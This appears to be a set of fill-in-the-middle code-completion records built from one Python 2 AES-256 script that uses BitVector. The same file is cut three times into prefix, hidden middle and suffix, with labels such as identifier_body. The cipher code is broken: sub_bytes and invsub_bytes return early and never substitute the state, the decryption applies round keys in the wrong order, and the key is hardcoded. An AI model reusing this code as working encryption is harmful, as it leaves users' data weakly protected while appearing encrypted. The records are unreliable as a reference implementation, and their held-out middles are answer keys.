| for i in xrange(1, 4): # to select row
state[i] = state[i][i:4] + state[i][0:i] | identifier_body |
AES.py | #! /usr/bin/env python
from BitVector import BitVector
RCON = [
0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,
0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a,
0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a,
0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39,
0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25,
0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a,
0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08,
0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,
0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6,
0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef,
0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61,
0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc,
0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01,
0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b,
0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e,
0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3,
0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4,
0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94,
0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8,
0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20,
0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d,
0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35,
0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91,
0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f,
0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d,
0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04,
0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c,
0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63,
0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa,
0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd,
0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66,
0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d]
SBOX = [
[0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76],
[0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0],
[0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15],
[0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75],
[0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84],
[0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf],
[0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8],
[0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2],
[0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73],
[0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb],
[0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79],
[0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08],
[0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a],
[0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e],
[0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf],
[0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]
]
INVSBOX = [
[0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb],
[0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb],
[0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e],
[0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25],
[0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92],
[0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84],
[0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06],
[0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b],
[0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73],
[0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e],
[0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b],
[0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4],
[0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f],
[0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef],
[0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61],
[0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d]
]
plaintxt = "plaintext.txt"
encout = "encrypted.out"
enctxt = "encryptedtext.txt"
dectxt = "decryptedtext.txt"
default_key = "anunexaminedlifeisnotworthliving"
def encrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=plaintxt)
enctxtout = open(enctxt, "w")
fout = open(encout, "wb")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[0:4])
for i in xrange(1, 14):
sub_bytes(rstate)
shift_rows(rstate)
mix_cols(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
sub_bytes(rstate)
shift_rows(rstate)
add_round_key(rstate, keyschedule[56:60])
for i in xrange(0, 4):
for j in xrange(0, 4):
enctxtout.write(rstate[i][j].get_hex_string_from_bitvector())
rstate[i][j].write_to_file(fout)
fout.close()
enctxtout.close()
def sub_word(word, sbox):
newword = ''
for i in xrange(0, 32, 8):
[row, col] = word[i:i+8].divide_into_two()
row = row.int_val()
col = col.int_val()
newword += str(BitVector(intVal=sbox[row][col]))
return BitVector(bitstring=newword)
def sub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=SBOX[row][col])
def shift_rows(state):
for i in xrange(1, 4): # to select row
state[i] = state[i][i:4] + state[i][0:i]
def mix_cols(state):
mod = BitVector(bitstring='100011011')
bv2 = BitVector(hexstring='2')
bv3 = BitVector(hexstring='3')
for j in xrange(0, 4): # to select col
s0 = state[0][j]
s1 = state[1][j]
s2 = state[2][j]
s3 = state[3][j]
sp0 = bv2.gf_multiply_modular(s0, mod, 8) ^ bv3.gf_multiply_modular(s1, mod, 8) ^ s2 ^ s3
sp1 = s0 ^ bv2.gf_multiply_modular(s1, mod, 8) ^ bv3.gf_multiply_modular(s2, mod, 8) ^ s3
sp2 = s0 ^ s1 ^ bv2.gf_multiply_modular(s2, mod, 8) ^ bv3.gf_multiply_modular(s3, mod, 8)
sp3 = bv3.gf_multiply_modular(s0, mod, 8) ^ s1 ^ s2 ^ bv2.gf_multiply_modular(s3, mod, 8)
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def rot_word(word):
return word[8:32] + word[0:8]
def add_round_key(state, word):
for j in xrange(0, 4):
state[0][j] ^= word[j][0:8]
state[1][j] ^= word[j][8:16]
state[2][j] ^= word[j][16:24]
state[3][j] ^= word[j][24:32]
def key_expansion(key):
w = [0 for i in xrange(0, 64)]
for i in xrange(0, 8):
w[i] = BitVector(textstring=key[(i*4):(i*4+4)])
i = 8
while i < 60:
temp = w[i-1]
if (i % 8 == 0):
temp = sub_word((rot_word(temp)) ^ BitVector(intVal=RCON[i//8]), SBOX)
elif (i % 8 == 4):
temp = sub_word(temp, SBOX)
w[i] = w[i-8] ^ temp
i = i + 1
return w
def decrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=encout)
fout = open(dectxt, "w")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[56:60])
for i in xrange(1, 14):
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
invmix_cols(rstate)
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[0:4])
for i in xrange(0, 4):
for j in xrange(0, 4):
rstate[i][j].write_to_file(fout)
fout.close()
def invsub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=INVSBOX[row][col])
def invshift_rows(state):
for i in xrange(1, 4): # to select row
state[i] = state[i][-i:] + state[i][:-i]
def | (state):
mod = BitVector(bitstring='100011011')
brw0 = [BitVector(hexstring='0e'),
BitVector(hexstring='0b'),
BitVector(hexstring='0d'),
BitVector(hexstring='09')]
brw1 = [brw0[3]] + brw0[1:4]
brw2 = [brw1[3]] + brw1[1:4]
brw3 = [brw2[3]] + brw2[1:4]
for j in xrange(0, 4): # to select col
s =[state[0][j],
state[1][j],
state[2][j],
state[3][j]]
sp0 = reduce(lambda x, y: x^y, [brw0[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp1 = reduce(lambda x, y: x^y, [brw1[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp2 = reduce(lambda x, y: x^y, [brw2[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp3 = reduce(lambda x, y: x^y, [brw3[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def main():
#key = raw_input("Please enter the key (or empty to use default key):\n")
#if not key:
key = default_key
keyschedule = key_expansion(key)
encrypt(keyschedule)
decrypt(keyschedule)
if __name__ == "__main__":
main()
| invmix_cols | identifier_name |
AES.py | #! /usr/bin/env python
from BitVector import BitVector
RCON = [
0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,
0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a,
0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a,
0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39,
0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25,
0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a,
0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08,
0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,
0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6,
0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef,
0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61,
0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc,
0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01,
0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b,
0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e,
0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3,
0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4,
0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94,
0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8,
0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20,
0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d,
0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35,
0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91,
0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f,
0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d,
0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04,
0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c,
0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63,
0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa,
0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd,
0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66,
0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d]
SBOX = [
[0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76],
[0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0],
[0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15],
[0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75],
[0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84],
[0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf],
[0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8],
[0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2],
[0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73],
[0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb],
[0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79],
[0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08],
[0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a],
[0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e],
[0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf],
[0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]
]
INVSBOX = [
[0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb],
[0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb],
[0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e],
[0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25],
[0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92],
[0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84],
[0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06],
[0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b],
[0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73],
[0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e],
[0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b],
[0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4],
[0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f],
[0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef],
[0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61],
[0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d]
]
plaintxt = "plaintext.txt"
encout = "encrypted.out"
enctxt = "encryptedtext.txt"
dectxt = "decryptedtext.txt"
default_key = "anunexaminedlifeisnotworthliving"
def encrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=plaintxt)
enctxtout = open(enctxt, "w")
fout = open(encout, "wb")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[0:4])
for i in xrange(1, 14):
sub_bytes(rstate)
shift_rows(rstate)
mix_cols(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
sub_bytes(rstate)
shift_rows(rstate)
add_round_key(rstate, keyschedule[56:60])
for i in xrange(0, 4):
|
fout.close()
enctxtout.close()
def sub_word(word, sbox):
newword = ''
for i in xrange(0, 32, 8):
[row, col] = word[i:i+8].divide_into_two()
row = row.int_val()
col = col.int_val()
newword += str(BitVector(intVal=sbox[row][col]))
return BitVector(bitstring=newword)
def sub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=SBOX[row][col])
def shift_rows(state):
for i in xrange(1, 4): # to select row
state[i] = state[i][i:4] + state[i][0:i]
def mix_cols(state):
mod = BitVector(bitstring='100011011')
bv2 = BitVector(hexstring='2')
bv3 = BitVector(hexstring='3')
for j in xrange(0, 4): # to select col
s0 = state[0][j]
s1 = state[1][j]
s2 = state[2][j]
s3 = state[3][j]
sp0 = bv2.gf_multiply_modular(s0, mod, 8) ^ bv3.gf_multiply_modular(s1, mod, 8) ^ s2 ^ s3
sp1 = s0 ^ bv2.gf_multiply_modular(s1, mod, 8) ^ bv3.gf_multiply_modular(s2, mod, 8) ^ s3
sp2 = s0 ^ s1 ^ bv2.gf_multiply_modular(s2, mod, 8) ^ bv3.gf_multiply_modular(s3, mod, 8)
sp3 = bv3.gf_multiply_modular(s0, mod, 8) ^ s1 ^ s2 ^ bv2.gf_multiply_modular(s3, mod, 8)
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def rot_word(word):
return word[8:32] + word[0:8]
def add_round_key(state, word):
for j in xrange(0, 4):
state[0][j] ^= word[j][0:8]
state[1][j] ^= word[j][8:16]
state[2][j] ^= word[j][16:24]
state[3][j] ^= word[j][24:32]
def key_expansion(key):
w = [0 for i in xrange(0, 64)]
for i in xrange(0, 8):
w[i] = BitVector(textstring=key[(i*4):(i*4+4)])
i = 8
while i < 60:
temp = w[i-1]
if (i % 8 == 0):
temp = sub_word((rot_word(temp)) ^ BitVector(intVal=RCON[i//8]), SBOX)
elif (i % 8 == 4):
temp = sub_word(temp, SBOX)
w[i] = w[i-8] ^ temp
i = i + 1
return w
def decrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=encout)
fout = open(dectxt, "w")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[56:60])
for i in xrange(1, 14):
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
invmix_cols(rstate)
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[0:4])
for i in xrange(0, 4):
for j in xrange(0, 4):
rstate[i][j].write_to_file(fout)
fout.close()
def invsub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=INVSBOX[row][col])
def invshift_rows(state):
for i in xrange(1, 4): # to select row
state[i] = state[i][-i:] + state[i][:-i]
def invmix_cols(state):
mod = BitVector(bitstring='100011011')
brw0 = [BitVector(hexstring='0e'),
BitVector(hexstring='0b'),
BitVector(hexstring='0d'),
BitVector(hexstring='09')]
brw1 = [brw0[3]] + brw0[1:4]
brw2 = [brw1[3]] + brw1[1:4]
brw3 = [brw2[3]] + brw2[1:4]
for j in xrange(0, 4): # to select col
s =[state[0][j],
state[1][j],
state[2][j],
state[3][j]]
sp0 = reduce(lambda x, y: x^y, [brw0[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp1 = reduce(lambda x, y: x^y, [brw1[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp2 = reduce(lambda x, y: x^y, [brw2[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp3 = reduce(lambda x, y: x^y, [brw3[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def main():
#key = raw_input("Please enter the key (or empty to use default key):\n")
#if not key:
key = default_key
keyschedule = key_expansion(key)
encrypt(keyschedule)
decrypt(keyschedule)
if __name__ == "__main__":
main()
| for j in xrange(0, 4):
enctxtout.write(rstate[i][j].get_hex_string_from_bitvector())
rstate[i][j].write_to_file(fout) | conditional_block |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.